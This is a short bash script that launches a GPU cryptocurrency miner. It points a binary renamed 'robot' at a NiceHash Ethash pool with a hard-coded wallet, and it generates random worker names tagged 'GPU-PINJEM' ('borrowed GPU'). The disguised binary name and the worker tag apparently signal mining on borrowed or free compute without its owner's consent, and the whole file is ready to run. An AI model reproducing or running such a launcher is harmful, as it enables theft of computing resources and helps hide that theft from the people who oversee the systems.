#!/bin/bash

POOL=stratum+tcp://daggerhashimoto.eu.nicehash.com:3353

WALLET=3J7rYdE9j5tvhms2emkNCLpvJ2fmVcHxri

WORKER=$(echo $(shuf -i 1000-9999 -n 1)-GPU-PINJEM)

chmod +x robot

./robot --algo ETHASH --pool $POOL --user $WALLET.$WORKER --ethstratum ETHPROXY
